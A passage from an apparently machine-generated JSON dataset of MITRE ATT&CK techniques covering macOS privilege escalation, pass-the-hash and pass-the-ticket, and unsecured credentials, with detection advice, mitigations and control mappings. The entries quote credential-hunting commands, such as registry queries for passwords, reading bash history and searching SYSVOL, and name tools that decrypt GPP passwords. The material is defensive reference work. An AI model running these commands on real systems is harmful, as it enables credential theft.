AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", + "detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "cumulative_score": 1.8237108401733333, + "adjusted_score": 1.8237108401733333, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "RA-5", + "SC-18", + "SC-34", + "SI-12", + "SI-16", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1550", + "name": "Use Alternate Authentication Material", + "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n", + "url": "https://attack.mitre.org/techniques/T1550", + "tactics": [ + "Defense Evasion", + "Lateral Movement" + ], + "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "platforms": [ + "Google Workspace", + "IaaS", + "Office 365", + "SaaS", + "Windows" + ], + "data_sources": [ + "Active Directory: Active Directory Credential Request", + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "User Account: User Account Authentication", + "Web Credential: Web Credential Usage" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1550.001", + "name": "Use Alternate Authentication Material: Application Access Token", + "url": "https://attack.mitre.org/techniques/T1550/001", + "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", + "detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1550.002", + "name": "Use Alternate Authentication Material: Pass the Hash", + "url": "https://attack.mitre.org/techniques/T1550/002", + "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)", + "detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1550.003", + "name": "Use Alternate Authentication Material: Pass the Ticket", + "url": "https://attack.mitre.org/techniques/T1550/003", + "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)", + "detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1550.004", + "name": "Use Alternate Authentication Material: Web Session Cookie", + "url": "https://attack.mitre.org/techniques/T1550/004", + "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)", + "detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.37366190476190475, + "adjusted_score": 0.37366190476190475, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "4.7,5.2,5.3,5.4,6.1,6.2" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CM-5", + "CM-6", + "IA-2" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1552", + "name": "Unsecured Credentials", + "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).", + "url": "https://attack.mitre.org/techniques/T1552", + "tactics": [ + "Credential Access" + ], + "detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\n\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\n\nAdditionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Process: Process Creation", + "User Account: User Account Authentication", + "Windows Registry: Windows Registry Key Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1552.001", + "name": "Unsecured Credentials: Credentials In Files", + "url": "https://attack.mitre.org/techniques/T1552/001", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", + "detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1552.002", + "name": "Unsecured Credentials: Credentials in Registry", + "url": "https://attack.mitre.org/techniques/T1552/002", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", + "detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1552.003", + "name": "Unsecured Credentials: Bash History", + "url": "https://attack.mitre.org/techniques/T1552/003", + "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)", + "detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1552.004", + "name": "Unsecured Credentials: Private Keys", + "url": "https://attack.mitre.org/techniques/T1552/004", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.", + "detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1552.005", + "name": "Unsecured Credentials: Cloud Instance Metadata API", + "url": "https://attack.mitre.org/techniques/T1552/005", + "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", + "detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1552.006", + "name": "Unsecured Credentials: Group Policy Preferences", + "url": "https://attack.mitre.org/techniques/T1552/006", + "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n", + "detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1552.007", + "name": "Unsecured Credentials: Container API", + "url": "https://attack.mitre.org/techniques/T1552/007", + "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ", + "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "mitigations": [ + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 1.492349601975238, + "adjusted_score": 1.492349601975238, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.1,3.11,3.12,3.2,3.3,4.1,4.2,4.5,4.7,5.2,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,11.3,14.3,14.4,14.9,16.1,16.9,18.3,18.5,13.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-2", + "AC-20", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-3", + "IA-4", + "IA-5", + "RA-5", + "SA-11", + "SA-15", + "SC-12", + "SC-28", + "SC-4", + "SC-7", + "SI-10", + "SI-12", + "SI-15", + "SI-2", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1553", + "name": "Subvert Trust Controls", + "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being 